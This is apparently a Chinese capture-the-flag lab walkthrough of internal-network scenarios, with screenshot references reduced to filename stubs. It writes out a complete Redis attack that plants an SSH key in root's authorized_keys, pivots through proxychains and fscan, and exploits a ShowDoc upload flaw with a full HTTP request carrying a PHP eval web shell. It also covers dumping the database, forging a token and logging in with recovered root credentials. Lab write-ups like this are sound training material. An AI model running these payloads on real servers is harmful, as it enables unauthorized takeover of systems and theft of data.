ssh-keygen –t rsa # 默认情况下,生成后在用户的家目录下的 .ssh 目录下 执行生成key命令


(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt  #将公钥写入txt

cat /root/.ssh/1.txt |proxychains redis-cli -h 192.168.0.202 -p 6379 -a 123456 -x set crack

proxychains redis-cli -h 192.168.0.202 -p 6379 -a 123456

config set dir /root/.ssh      #设置存储公钥路径

config set dbfilename authorized_keys  #设置文件名称

get crack #查看缓存

save #保存缓存到目标主机路径及文件下

exit  #退出

image-20250221110708904

然后就可以进行连接了

proxychains ssh -i id_rsa -p 22000 root@192.168.0.202

image-20250221110816942

image-20250221111012849

场景3

image-20250221111314222

100机器也有22000端口

ssh连接 ssh root@192.168.0.100 -p 22000

image-20250221111627916

场景4

查看hosts

image-20250221111746923

wget上传fscan和venom

./fscan -h 172.16.0.233/24

[+] 目标 172.16.0.233    存活 (ICMP)
[+] 目标 172.16.0.1      存活 (ICMP)
[+] 目标 172.16.0.153    存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 172.16.0.233:6379
[+] 端口开放 172.16.0.153:80
[+] 端口开放 172.16.0.1:22
[+] 存活端口数量: 3
[*] 开始漏洞扫描...
[+] Redis扫描模块开始...
[*] 网站标题 http://172.16.0.153       状态码:302 长度:0      标题:无标题 重定向地址: http://172.16.0.153/web/#/
[*] 网站标题 http://172.16.0.153/web/#/ 状态码:200 长度:1739   标题:ShowDoc
[+] Redis 172.16.0.233:6379 123456 file:/root/.ssh/authorized_keys
[!] 扫描错误 172.16.0.1:22 - 扫描总时间超时: context deadline exceeded
[+] Redis 172.16.0.233:6379 可写入路径 /root/.ssh/
[+] Redis 172.16.0.233:6379 可写入路径 /var/spool/cron/

内网还存在web服务,挂二层代理

image-20250221112647057

找到showdoc的nday

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 172.16.0.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 265

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo '123_test';@eval($_POST[cmd])?>
----------------------------921378126371623762173617--


image-20250221113846179

蚁剑连接拿到flag

image-20250221114004317

场景5

下载sqlite目录里面的showdoc.db.php

image-20250221114308305

发现账号密码,但是密码破解不出来

image-20250221114727164

尝试用token伪造登录

image-20250221115455324

root:Test@1234

image-20250221115439673

扫描172.16.0.153的全端口

image-20250221115734696

然后ssh连接就可以proxychains ssh root@172.16.0.153 -p 22000

image-20250221123634896

找到最后一个flag

至此四个靶场全部打完